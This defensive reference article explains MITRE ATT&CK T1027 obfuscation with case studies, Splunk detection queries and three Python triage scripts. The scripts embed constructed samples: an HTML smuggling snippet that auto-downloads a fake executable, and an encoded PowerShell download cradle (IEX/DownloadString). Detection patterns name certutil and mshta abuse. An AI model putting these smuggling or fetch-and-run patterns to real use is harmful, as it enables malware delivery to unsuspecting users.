T1027 is among the broadest techniques in the MITRE ATT&CK framework, with 17 sub-techniques spanning every major obfuscation method. It appears in the procedures of over 400 documented malware families and threat groups. Virtually every sophisticated attack incorporates at least one form of obfuscation — making T1027 not just a technique, but a foundational capability that enables all other phases of an intrusion.
T1027 maps to a single ATT&CK tactic — Defense Evasion — but its impact extends across the entire kill chain. Obfuscation protects payloads during Initial Access (encrypted attachments, smuggled HTML files), shields commands during Execution (encoded PowerShell, obfuscated scripts), and conceals communications during Command and Control (encrypted C2 traffic, steganographic channels). It is the enabling layer that allows other techniques to function without being detected.
The technique applies on every platform ATT&CK lists for it: Windows, Linux, macOS, ESXi, and network devices. It covers files at rest on disk, data in transit over the network, and commands executed in memory. This breadth, combined with the effectively unlimited variety of encoding and encryption methods available, makes T1027 one of the hardest techniques to detect comprehensively.
How Obfuscation Works
Obfuscation serves three strategic purposes for an adversary:
Defeating static analysis. Security tools that scan files on disk rely on signatures, patterns, and string matching. Obfuscation transforms these recognizable patterns into unrecognizable data. An encoded PowerShell command, a packed executable, or an XOR-encrypted payload produces no matching signatures until it is decoded at runtime — at which point the static scanner has already classified the file as clean.
Inhibiting reverse engineering. When malware is captured for analysis, obfuscation increases the time and effort required to understand its functionality. Control flow flattening, junk code insertion, string encryption, and dynamic API resolution force analysts to spend hours or days deobfuscating code before they can begin understanding what it does. This buys the attacker time to operate before defenses are updated.
Bypassing content inspection. Email gateways, web proxies, and network security tools inspect traffic for malicious content. Obfuscation transforms that content into forms that pass inspection: Base64-encoded payloads embedded in HTML files, malicious code hidden within image pixels, or executables concealed inside password-protected archives that cannot be scanned.
Sub-Techniques
MITRE ATT&CK v18 defines 17 sub-techniques under T1027 — the largest set of any technique in the framework. These can be grouped into four functional categories:
Payload Encryption and Encoding
| Sub-Technique | Method |
|---|---|
| T1027.013 — Encrypted/Encoded File | Files encrypted with XOR, AES, RC4, or custom algorithms, or encoded with Base64, hex encoding, or ROT ciphers. The payload is decrypted/decoded at runtime. This is the most common obfuscation method, used by everything from nation-state implants to commodity infostealers. |
| T1027.002 — Software Packing | Executable compression using packers like UPX, Themida, VMProtect, or custom packers. The packed binary contains a decompression stub that unpacks the real payload into memory at execution time. Packing changes the file hash, defeats signature matching, and prevents static analysis of the contained code. |
| T1027.014 — Polymorphic Code | Malware that rewrites its own code with each infection cycle while maintaining identical functionality. Each instance produces a unique hash and unique code patterns, rendering signature-based detection fundamentally unable to keep pace. In 2026, agentic AI is accelerating polymorphic generation, allowing operators to produce new variants on demand without manual coding. |
| T1027.015 — Compression | Payloads compressed with standard algorithms (ZIP, GZIP, LZMA) or password-protected archives that prevent automated scanning. Compressed JavaScript, archived scripts, and nested ZIP files are common delivery vectors through email. |
Hiding Data in Other Files
| Sub-Technique | Method |
|---|---|
| T1027.003 — Steganography | Concealing malicious code, configuration data, or C2 addresses within image, audio, or video files using techniques like Least Significant Bit (LSB) substitution. The cover file appears completely normal to human observers and file-type analysis. The payload is extracted at runtime by the malware. Steganographic attacks increased significantly in 2024-2025, with campaigns using PowerShell to download and extract DLL payloads hidden within GIF and PNG images. |
| T1027.006 — HTML Smuggling | Embedding malicious payloads as encoded data within HTML files or JavaScript blobs. When the victim opens the HTML file in a browser, JavaScript assembles and downloads the payload locally, bypassing network-layer security that only sees legitimate HTML traffic. Widely used by NOBELIUM, Qakbot, and phishing campaigns targeting Microsoft 365. |
| T1027.017 — SVG Smuggling | A newer variant of HTML smuggling that embeds malicious JavaScript and encoded payloads within SVG (Scalable Vector Graphics) image files. Because SVG files are XML-based and support embedded scripts, they can execute code when opened in a browser while appearing to be harmless image files. SVG smuggling campaigns targeting Brazilian banking malware evolved into memory-resident loaders in 2025. |
| T1027.009 — Embedded Payloads | Malicious code hidden within the resources, overlays, or appended data sections of otherwise legitimate-looking files. The host file functions normally while carrying a concealed payload extracted during execution. |
| T1027.012 — LNK Icon Smuggling | Embedding malicious data within the icon resource of Windows shortcut (LNK) files. The LNK file displays a legitimate icon while carrying hidden payload data that is extracted and executed by the shortcut's target command. |
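As an added example (Python written for this page, not code from MITRE or any vendor cited here), the following triage script applies the content-inspection logic the HTML smuggling and SVG smuggling rows describe: it looks for the JavaScript primitives that assemble a file client-side (atob, Uint8Array, Blob, createObjectURL, the download attribute, and for SVG a script block or event handler), extracts every long base64 run, decodes it, and checks the result for the magic bytes of a PE, ZIP, GZIP, OLE2 or ISO image. The HTML and SVG samples are constructed inline around fake payload bytes, the filenames are placeholders, and the 200-character blob threshold is an assumption to tune.

```python
"""Triage an HTML or SVG attachment for client-side payload assembly (HTML/SVG smuggling)."""
import base64
import re

# Magic bytes of things that have no business being assembled inside a web page or an image.
MAGIC_AT_START = {
    b"MZ": "PE executable",
    b"PK\x03\x04": "ZIP archive",
    b"\x1f\x8b": "GZIP stream",
    b"\xd0\xcf\x11\xe0": "OLE2 document",
}

# JavaScript primitives used to turn an inline blob into a file and hand it to the browser.
ASSEMBLY_MARKERS = {
    "atob": r"\batob\s*\(",
    "Uint8Array": r"\bUint8Array\b",
    "Blob": r"\bnew\s+Blob\s*\(",
    "createObjectURL": r"\bcreateObjectURL\s*\(",
    "msSaveOrOpenBlob": r"\bmsSaveOrOpenBlob\b",
    "download-attribute": r"\.download\s*=",
}
# Markers that only matter for an "image": a script block or event handler inside SVG.
SVG_MARKERS = {
    "svg-script": r"<script\b",
    "svg-event-handler": r"\bon(?:load|error|click)\s*=",
}
# A base64 run long enough to carry a file rather than a small inline icon (threshold assumed).
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def find_markers(filename, text):
    """Names of every assembly primitive present; SVG-specific checks only for .svg files."""
    names = [n for n, p in ASSEMBLY_MARKERS.items() if re.search(p, text)]
    if filename.lower().endswith(".svg"):
        names += [n for n, p in SVG_MARKERS.items() if re.search(p, text, re.IGNORECASE)]
    return names


def identify_blob(blob):
    """Decode one base64 run and name the file type it carries, or None if it is not a file."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass: bad alphabet or padding
        return None
    for magic, kind in MAGIC_AT_START.items():
        if raw.startswith(magic):
            return kind
    if raw[0x8001:0x8006] == b"CD001":  # ISO 9660 primary volume descriptor
        return "ISO 9660 image"
    return None


def scan_attachment(filename, content):
    """Verdict: block (a file is embedded), suspicious (assembly code, no file found) or clean."""
    markers = find_markers(filename, content)
    embedded = [k for k in map(identify_blob, BASE64_RUN.findall(content)) if k]
    verdict = "block" if embedded else "suspicious" if markers else "clean"
    return {"file": filename, "markers": markers, "embedded": embedded, "verdict": verdict}


# Constructed samples (not real campaign artifacts): fake payload bytes, base64-wrapped.
FAKE_PE = base64.b64encode(b"MZ" + b"\x90" * 400).decode()
FAKE_ZIP = base64.b64encode(b"PK\x03\x04" + b"\x00" * 300).decode()

SAMPLE_HTML = f"""<html><body><script>
var b = atob("{FAKE_PE}");
var a = new Uint8Array(b.length);
for (var i = 0; i < b.length; i++) a[i] = b.charCodeAt(i);
var blob = new Blob([a], {{type: "application/octet-stream"}});
var link = document.createElement("a");
link.href = URL.createObjectURL(blob); link.download = "invoice.exe"; link.click();
</script></body></html>"""

SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" onload="run()">
<script><![CDATA[ function run() {{ var d = atob("{FAKE_ZIP}"); }} ]]></script></svg>"""

BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for name, body in [("invoice.html", SAMPLE_HTML), ("logo.svg", SAMPLE_SVG), ("icon.svg", BENIGN_SVG)]:
        print(scan_attachment(name, body))
```

Real campaigns split or reverse the blob, build it from array fragments, or fetch the final stage only after a click, so a gateway rule built on this should treat the "suspicious" verdict (assembly primitives without a recoverable file) as a quarantine, not a pass.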
Code and Command Obfuscation
| Sub-Technique | Method |
|---|---|
| T1027.010 — Command Obfuscation | Obscuring commands executed via PowerShell, cmd.exe, bash, or other interpreters using environment variable substitution, string concatenation, character escaping, Base64 encoding, or tool-specific obfuscation (e.g., Invoke-Obfuscation for PowerShell). A 2025 campaign used SomalifuscatorV2, ROT-24 encoding, and UTF-16 BOM insertion to achieve 0/64 detection on VirusTotal. |
| T1027.004 — Compile After Delivery | Delivering source code or intermediate language that is compiled on the victim system using native compilers (csc.exe for C#, gcc for C, MSBuild for project files). The uncompiled source avoids binary-focused detection entirely. |
| T1027.007 — Dynamic API Resolution | Resolving Windows API function addresses at runtime through hash-based lookups rather than static imports. The import table of the executable appears clean, hiding the malware's true capabilities from static analysis tools that enumerate imported functions. |
| T1027.016 — Junk Code Insertion | Adding non-functional code, dead branches, and irrelevant instructions to increase binary size, alter hashes, and complicate analysis. Simple but effective at defeating hash-based and pattern-matching detections. |
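The command obfuscation row above describes stacked encoding layers. As an added example (Python written for this page, not from MITRE or any vendor cited here), the following script peels those layers off a PowerShell command line the way an analyst does before writing a detection: it decodes the UTF-16LE base64 that follows any spelling of -EncodedCommand that PowerShell accepts, then repeatedly finds FromBase64String literals, decodes them, gunzips where the bytes are a gzip stream, and flags download-cradle and Invoke-Expression behaviour in the readable text. The three-layer sample command is constructed inline from a plain download cradle; the 127.0.0.1 URL is a placeholder, and a real Invoke-Obfuscation output would add string concatenation and casing tricks this decoder does not undo.

```python
"""Peel the encoding layers off an obfuscated PowerShell command line."""
import base64
import gzip
import re
import zlib

# A quoted literal handed to [Convert]::FromBase64String(...), the usual inner layer.
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)

# Behaviours worth alerting on once the text is readable (mirrors the 4104 query on this page).
INDICATORS = {
    "download-cradle": r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b",
    "invoke-expression": r"\bIEX\b|Invoke-Expression",
    "process-launch": r"Start-Process",
    "nested-decoding": r"FromBase64String|GzipStream|DeflateStream",
}


def encoded_command_argument(cmdline):
    """Base64 following -EncodedCommand or any prefix PowerShell accepts (-e, -ec, -enc, ...)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok[:1] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            return tokens[i + 1]
    return None


def bytes_to_text(raw):
    """Gunzip if the bytes are a gzip stream, then decode UTF-16LE (what -enc uses) or UTF-8."""
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    odd_bytes = raw[1::2]
    if odd_bytes and odd_bytes.count(0) > 0.9 * len(odd_bytes):  # ASCII-in-UTF-16LE signature
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel_layers(cmdline, max_layers=10):
    """Return the command line followed by each decoded layer, outermost first."""
    layers = [cmdline]
    frontier = [cmdline]
    arg = encoded_command_argument(cmdline)
    if arg:
        try:
            outer = bytes_to_text(base64.b64decode(arg))
            layers.append(outer)
            frontier = [outer]
        except (ValueError, OSError, EOFError, zlib.error):  # not base64, or a broken gzip stream
            pass
    while frontier and len(layers) < max_layers:
        text = frontier.pop(0)
        for literal in B64_LITERAL.findall(text):
            try:
                decoded = bytes_to_text(base64.b64decode(literal))
            except (ValueError, OSError, EOFError, zlib.error):
                continue
            layers.append(decoded)
            frontier.append(decoded)
    return layers


def indicators(layers):
    """Sorted names of every behaviour indicator found in any layer."""
    return sorted({n for layer in layers for n, p in INDICATORS.items()
                   if re.search(p, layer, re.IGNORECASE)})


def build_sample():
    """Constructed three-layer sample: cradle -> gzip+base64 inside an IEX wrapper -> -enc."""
    inner = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/stage2.ps1')"
    gz = base64.b64encode(gzip.compress(inner.encode(), mtime=0)).decode()
    middle = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
              "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + gz + "'))),"
              "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::UTF8)).ReadToEnd()")
    outer = base64.b64encode(middle.encode("utf-16-le")).decode()
    return "powershell.exe -NoP -W Hidden -enc " + outer, middle, inner


if __name__ == "__main__":
    cmd, _, _ = build_sample()
    for depth, layer in enumerate(peel_layers(cmd)):
        print(f"layer {depth}: {layer[:90]}")
    print("indicators:", indicators(peel_layers(cmd)))
```

The point of peeling before matching is that the outer command line contains none of the strings a signature would look for; only the third layer reveals the download cradle, which is also why Script Block Logging, which records each layer as PowerShell compiles it, is the telemetry that sees this without any decoding on the analyst's side.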
Artifact Removal and Manipulation
| Sub-Technique | Method |
|---|---|
| T1027.005 — Indicator Removal from Tools | Removing or modifying indicators from tools when detected — stripping debug symbols, removing identifying strings, changing file signatures, or recompiling with modified parameters to evade updated detections. |
| T1027.008 — Stripped Payloads | Removing symbol tables, debug information, and other metadata from compiled binaries to hinder reverse engineering and prevent analysts from understanding function names and program structure. |
| T1027.001 — Binary Padding | Appending junk data to a malicious binary to alter its hash, increase its file size (potentially exceeding sandbox analysis limits), and change its on-disk representation without affecting functionality. |
| T1027.011 — Fileless Storage | Storing malicious content in locations that bypass traditional file-based scanning — Windows Registry values, WMI repositories, event logs, or other system databases where executable content is not expected. |
AI-Assisted Obfuscation in 2026
Generative AI has introduced a new dimension to malware obfuscation. State-backed actors from Iran, China, North Korea, and Russia have been documented using LLM services to generate obfuscated scripts, refine payload encoding, and produce polymorphic variants. A phishing campaign targeting French users used HTML smuggling to deliver password-protected ZIP archives containing VBScript and JavaScript with the neatly formatted comments characteristic of AI-generated code, a tell that helps forensic identification even as the same tooling helps the attacker.
The more concerning trend is the use of AI to automate polymorphic generation at scale. When an attacker can prompt an LLM to produce functionally identical but syntactically unique payloads on demand, the traditional concept of a "signature" for a malware family becomes fundamentally inadequate. Each instance is unique. Each hash is novel. Only behavioral detection that focuses on what the code does — rather than what it looks like — can keep pace.
Real-World Case Studies
3CX Supply Chain Compromise — Multi-Layer Obfuscation
The 2023 3CX supply chain attack, attributed to Lazarus Group (North Korea), demonstrated multi-layer obfuscation. The trojanized desktop application side-loaded a malicious DLL, which read an encrypted payload appended to a second, otherwise legitimate DLL whose code signature still verified, and decrypted it in memory, so the malicious content looked like ordinary application data to static analysis and passed signature checks. The chain also employed a steganographic channel: the next-stage C2 server addresses were encoded inside icon files hosted in a GitHub repository. This layering of encrypted payloads, legitimate code camouflage, and steganographic communication meant the trojanized builds shipped for weeks before behavioral EDR alerts exposed the compromise and triggered a multi-vendor investigation.
Steganographic RAT Delivery Campaigns (Q3 2025)
Forcepoint X-Labs documented a wave of campaigns in Q3 2025 using obfuscated JavaScript email attachments that leveraged PowerShell and steganography to deliver .NET-based RATs and infostealers. The attack chain began with heavily obfuscated JavaScript files that, when executed, launched PowerShell commands to download seemingly innocent GIF image files. The images contained DLL payloads hidden using LSB steganography, which were extracted by the PowerShell script, loaded into memory via process hollowing, and executed without ever touching disk as recognizable executables. The combination of script obfuscation, steganographic payload delivery, and in-memory execution created a delivery pipeline that defeated email gateways, network inspection, and endpoint file scanning simultaneously.
SVG Smuggling Evolution — From Banking Malware to Memory-Resident Loaders
In 2025, security researchers tracked the evolution of SVG smuggling techniques from initial use in Brazilian banking malware to sophisticated memory-resident loaders targeting organizations worldwide. The threat actors embedded encoded payloads and malicious JavaScript within SVG image files, which were delivered through phishing emails. When opened in a browser, the SVG files executed embedded scripts that assembled and launched payloads entirely in memory. The latest variants adopted modular architectures with encrypted communications, representing what researchers described as "a natural evolution" from earlier, simpler smuggling techniques into full-featured evasion platforms.
Zero-Detection Batch File Obfuscation
VMRay documented a heavily obfuscated Windows batch file that scored 0/64 on VirusTotal through layered obfuscation. The file was obfuscated with SomalifuscatorV2, carried a UTF-16 Byte Order Mark to confuse text editors and parsers, applied ROT-24 encoding to further obscure its content, and ran an anti-analysis check that exited when launched from a command line (typical of a sandbox) but proceeded when double-clicked (typical of a real victim). The batch file invoked MSHTA to run further obfuscated code, which used PowerShell to download and execute an infostealer that exfiltrated data through Discord. The case shows how a stack of individually simple tricks defeats static file scanning outright. A VirusTotal score measures file scanners only; the batch file's child processes (mshta.exe, then PowerShell with a download cradle) are exactly what the process-creation and script block telemetry below is meant to catch.
NOBELIUM / Cozy Bear — HTML Smuggling at Scale
The Russian state-sponsored group behind the SolarWinds attack has extensively used HTML smuggling (T1027.006) in phishing campaigns. Their EnvyScout dropper delivers malicious payloads encoded as Base64 blobs within HTML email attachments. When the victim opens the attachment in a browser, JavaScript decodes and assembles a malicious ISO or IMG file that is automatically downloaded. Because the email attachment is a legitimate HTML file and the payload assembly occurs client-side in the browser, email security gateways that inspect attachments see only HTML and JavaScript — no executable content passes through the network. This technique has been used to deliver Cobalt Strike beacons, BoomBox downloaders, and other post-exploitation tools.
Detection Strategies
Detecting obfuscation is fundamentally different from detecting other ATT&CK techniques. The obfuscation itself is not the malicious action — it is the concealment layer that hides the malicious action. Detection strategies must therefore focus on identifying obfuscation artifacts, monitoring the deobfuscation process, and analyzing the behavior of the deobfuscated content.
Key Indicators and Data Sources
| Indicator | What to Monitor |
|---|---|
| High file entropy | Encrypted and packed content approaches 8.0 bits per byte (the maximum, reached by uniformly random data). Files above 7.0 whose magic bytes do not identify a compressed or media format (ZIP, PNG, JPEG, PDF) warrant investigation; decide on the magic bytes, not the file extension, since legitimately compressed formats score just as high |
| Base64 in scripts | PowerShell commands containing -EncodedCommand, [Convert]::FromBase64String, or long Base64 strings in command-line arguments |
| Script block logging | PowerShell Script Block Logging (Event ID 4104) records each script block as the engine compiles it, so content that is decoded and then passed to Invoke-Expression is logged in the clear in its own event, one per decoding layer, regardless of how the outer command line was encoded |
| Packer signatures | PE file section names associated with known packers (UPX0/UPX1, .themida, .vmp), unusual section characteristics, or import tables with only a few functions (typical of packed binaries that resolve imports at runtime) |
| LOLBin abuse | Execution of certutil.exe -decode, mshta.exe, regsvr32.exe, or rundll32.exe with encoded or obfuscated arguments — legitimate tools being used to decode and execute hidden payloads |
| HTML/SVG attachments | Email attachments containing HTML or SVG files with large embedded JavaScript blobs, especially those using atob(), Uint8Array, or Blob constructors to assemble files client-side |
Detection Queries
These queries target the deobfuscation and execution phases where obfuscated content is decoded and run. Tune to exclude legitimate administrative scripts and automation.
Encoded PowerShell Execution — Detects PowerShell launched with a Base64 -EncodedCommand (in any of its accepted spellings) or decoding Base64 inline, the most common script obfuscation method. A bare *-enc* wildcard would also match the benign -Encoding parameter, so the short forms below anchor on the surrounding spaces:
index=sysmon EventCode=1 (Image="*\\powershell.exe" OR Image="*\\pwsh.exe") (CommandLine="* -e *" OR CommandLine="* -ec *" OR CommandLine="* -enc *" OR CommandLine="*-EncodedCommand*" OR CommandLine="*FromBase64String*" OR CommandLine="*[Convert]*") | table _time, Computer, User, ParentImage, CommandLine
LOLBin Decoding Operations — Identifies legitimate Windows binaries being used to decode obfuscated payloads:
index=sysmon EventCode=1 (CommandLine="*certutil*-decode*" OR CommandLine="*certutil*-urlcache*" OR CommandLine="*mshta*javascript:*" OR CommandLine="*mshta*vbscript:*") | table _time, Computer, User, ParentImage, Image, CommandLine
PowerShell Script Block Logging for Deobfuscated Content — Searches the script blocks PowerShell actually compiled, so each decoding layer appears in the clear regardless of how the command line was encoded:
index=wineventlog source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 (ScriptBlockText="*Net.WebClient*" OR ScriptBlockText="*DownloadString*" OR ScriptBlockText="*Invoke-Expression*" OR ScriptBlockText="*IEX*" OR ScriptBlockText="*Start-Process*") | table _time, Computer, UserID, ScriptBlockText
Known Threat Actors and Malware Using T1027
T1027 has one of the largest documented procedure lists in the entire ATT&CK framework. The following represents a cross-section across the obfuscation spectrum:
| Actor / Malware | Obfuscation Methods |
|---|---|
| Lazarus Group | AES-encrypted payloads, steganographic C2 in icon files, multi-layer encoding in supply chain attacks (3CX) |
| NOBELIUM / Cozy Bear | HTML smuggling via EnvyScout, Base64-encoded payloads in HTML attachments, layered encryption in GoldMax/SUNSHUTTLE |
| APT28 / Fancy Bear | XOR-encrypted strings, custom packers, stripped payloads in Sofacy and Zebrocy toolsets |
| APT41 | Custom packers, DLL side-loading with encrypted payloads, DUSTPAN loader obfuscation |
| Mustang Panda | Custom encrypted loaders (PAKLOG, CorKLOG), SplatCloak obfuscated drivers |
| FIN7 | Obfuscated JavaScript, encoded PowerShell downloaders, DiceLoader with custom encryption |
| LummaC2 | Control flow flattening, XOR-encrypted strings, dynamic configuration files, trigonometric anti-analysis |
| Cobalt Strike | Malleable C2 profiles with encoded traffic, packed Beacon payloads, shellcode encryption |
| Qakbot | HTML smuggling delivery, multi-layer packed DLLs, encoded configuration files |
| FormBook / XLoader | Heavy encryption, custom packing across Windows and macOS variants |
Defensive Recommendations
Signature-based detection is fundamentally inadequate against obfuscation. Each encoding, encryption, or packing method produces unique file hashes and unique byte patterns. Detection must focus on behavioral analysis, deobfuscation monitoring, and content inspection after decoding rather than pattern matching against obfuscated content.
- Enable PowerShell Script Block Logging and AMSI: Event ID 4104 records each script block as PowerShell compiles it, so the text handed to Invoke-Expression after each decoding step is logged in the clear; AMSI passes that same text to the endpoint AV engine at the same point. Together they are the most valuable telemetry for obfuscated PowerShell, the dominant script obfuscation vector. Alert on 4104 events that contain AMSI-tampering strings such as AmsiUtils or amsiInitFailed, and on script block logging being turned off (T1562.001).
- Deploy content disarm and reconstruction (CDR): CDR solutions strip active content from documents, HTML files, and other file types before delivery to users. This neutralizes HTML smuggling, SVG smuggling, embedded payloads, and macro-based obfuscation by removing the scripting and encoding mechanisms that deliver the payload, regardless of the specific obfuscation technique used.
- Implement entropy-based file analysis: Configure security tools to flag files with abnormally high entropy scores, which indicate encryption or compression. Legitimate executables typically have entropy between 5.0 and 7.0. Files above 7.0 that are not recognized compressed formats warrant additional analysis. Apply this to both inbound email attachments and files created on endpoints.
- Block or restrict LOLBin abuse: Monitor and restrict the execution of Windows binaries commonly used for decoding: certutil.exe with decode parameters, mshta.exe with script arguments, regsvr32.exe loading remote content, and rundll32.exe with unusual DLL paths. Application control policies can restrict these binaries to specific approved use cases.
- Deploy behavioral EDR with memory scanning: Since obfuscated payloads must be decoded before execution, behavioral EDR that monitors process memory can detect the deobfuscated malicious content when it materializes in memory. This catches packed, encrypted, and steganographically hidden payloads at the moment they transition from concealed to executable.
- Restrict HTML and SVG email attachments: Block or quarantine HTML and SVG file attachments at the email gateway. Legitimate business communication rarely requires HTML file attachments, and in most organizations an SVG attachment has no business use at all, so treat one as suspicious by default. If business needs require HTML attachments, implement CDR processing before delivery.
- Analyze network traffic for encoding patterns: Deploy network detection that identifies Base64-encoded blobs, unusual Content-Type headers, and steganographic indicators in image file downloads. Monitor for large data transfers disguised as image downloads from suspicious domains.
- Use sandbox detonation with extended analysis: Ensure sandbox environments execute samples long enough for time-delayed deobfuscation to occur, force-execute sleep calls, and capture the deobfuscated payloads when they materialize. Combine sandbox analysis with static entropy analysis and import table inspection to identify packed or encrypted samples before detonation.
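The entropy and packer-signature recommendations above are easy to state and easy to get wrong: a PNG or ZIP attachment legitimately sits near 8.0 bits per byte, and a packed binary's overall entropy is dragged down by its headers. As an added example (Python written for this page rather than taken from any vendor tool), the following triage script computes Shannon entropy, recognises common compressed formats by magic bytes before calling anything encrypted, and parses the PE section table so that packer section names and per-section entropy are reported separately from the whole-file figure. The packed and clean PE files are synthetic headers built inline to mimic UPX output, not real binaries; the 7.0 threshold and the 256-byte minimum section size are assumptions to tune.

```python
"""Entropy and packer-section triage for files landing on disk or arriving as attachments."""
import math
import struct
from collections import Counter

# Section names that common packers leave behind (UPX0/UPX1, .themida, .vmp and friends).
PACKER_SECTION_HINTS = ("UPX", ".themida", ".vmp", ".aspack", ".petite", ".MPRESS")

# Formats that are high-entropy by design; calling them "encrypted" is noise, not signal.
COMPRESSED_MAGIC = {b"PK\x03\x04": "zip", b"\x1f\x8b": "gzip", b"\x89PNG": "png",
                    b"\xff\xd8\xff": "jpeg", b"%PDF": "pdf", b"7z\xbc\xaf": "7z"}


def shannon_entropy(data):
    """Bits per byte: 0.0 for a single repeated value, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(data):
    """Parse the PE section table; returns [] for anything that is not a PE file."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return []
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0" or len(data) < pe_off + 24:
        return []
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        body = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "raw_size": raw_size, "entropy": round(shannon_entropy(body), 2)})
    return sections


def triage(filename, data, threshold=7.0, min_section=256):
    """Entropy, recognised format, packer hints and a verdict for one file."""
    overall = shannon_entropy(data)
    fmt = next((k for magic, k in COMPRESSED_MAGIC.items() if data.startswith(magic)), None)
    sections = pe_sections(data)
    packer_hits = [s["name"] for s in sections if s["name"].startswith(PACKER_SECTION_HINTS)]
    hot = [s["name"] for s in sections if s["entropy"] > threshold and s["raw_size"] >= min_section]
    reasons = []
    if packer_hits:
        reasons.append("packer section names: " + ", ".join(packer_hits))
    if hot:
        reasons.append("high-entropy sections: " + ", ".join(hot))
    if overall > threshold and fmt is None and not sections:
        reasons.append("high entropy in unrecognised format")
    return {"file": filename, "entropy": round(overall, 2), "format": fmt, "sections": sections,
            "reasons": reasons, "verdict": "investigate" if reasons else "pass"}


def build_fake_pe(section_bodies):
    """Constructed minimal PE32+ header plus the given (name, bytes) sections; not a runnable binary."""
    opt_size = 0xF0
    raw_ptr = 0x40 + 24 + opt_size + 40 * len(section_bodies)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew -> PE header at 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(section_bodies), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)
    headers, bodies = b"", b""
    for name, body in section_bodies:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(body), 0x1000,
                               len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += body
        raw_ptr += len(body)
    return dos + coff + opt + headers + bodies


# Constructed samples: UPX-style layout with a uniformly distributed "packed" section,
# a plain unpacked layout, a raw encrypted-looking blob, a PNG-tagged blob and a script.
UNIFORM = bytes(range(256))
PACKED_PE = build_fake_pe([(b"UPX0", b""), (b"UPX1", UNIFORM * 16), (b".rsrc", b"\0" * 512)])
CLEAN_PE = build_fake_pe([(b".text", b"\x55\x8b\xec" * 200), (b".data", b"\0" * 256)])
RAW_BLOB = UNIFORM * 4
PNG_BLOB = b"\x89PNG\r\n\x1a\n" + UNIFORM * 4
SCRIPT = b"Get-Process | Where-Object { $_.CPU -gt 100 }\n" * 20

if __name__ == "__main__":
    for name, data in [("packed.exe", PACKED_PE), ("clean.exe", CLEAN_PE), ("blob.bin", RAW_BLOB),
                       ("image.png", PNG_BLOB), ("task.ps1", SCRIPT)]:
        print(triage(name, data))
```

Per-section entropy is the figure to key on for PE files: the synthetic packed sample's whole-file entropy is well under 8.0 because of its zeroed headers and resource section, while its UPX1 section scores exactly 8.0. A custom packer will not use the UPX names, so the section-entropy rule is the one that survives renaming.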
MITRE ATT&CK Mapping
| Field | Value |
|---|---|
| Technique ID | T1027 |
| Technique Name | Obfuscated Files or Information |
| Tactics | Defense Evasion |
| Platforms | Windows, Linux, macOS, ESXi, Network Devices |
| Sub-Techniques | T1027.001 Binary Padding, .002 Software Packing, .003 Steganography, .004 Compile After Delivery, .005 Indicator Removal from Tools, .006 HTML Smuggling, .007 Dynamic API Resolution, .008 Stripped Payloads, .009 Embedded Payloads, .010 Command Obfuscation, .011 Fileless Storage, .012 LNK Icon Smuggling, .013 Encrypted/Encoded File, .014 Polymorphic Code, .015 Compression, .016 Junk Code Insertion, .017 SVG Smuggling |
| Data Sources | File (Content, Metadata), Process (Creation), Command (Execution), Script (Execution), Windows Registry (Key Modification) |
| MITRE Reference | attack.mitre.org/techniques/T1027 |
Sources and References
- MITRE ATT&CK — T1027 Obfuscated Files or Information: attack.mitre.org
- Picus Security — The MITRE ATT&CK T1027 Obfuscated Files or Information Technique: picussecurity.com
- Forcepoint X-Labs — Q3 2025 Threat Brief: Obfuscated JavaScript and Steganography: forcepoint.com
- VMRay — Malware and Phishing Threat Landscape Report 2024/2: vmray.com
- CISA — Eviction Strategies for T1027: cisa.gov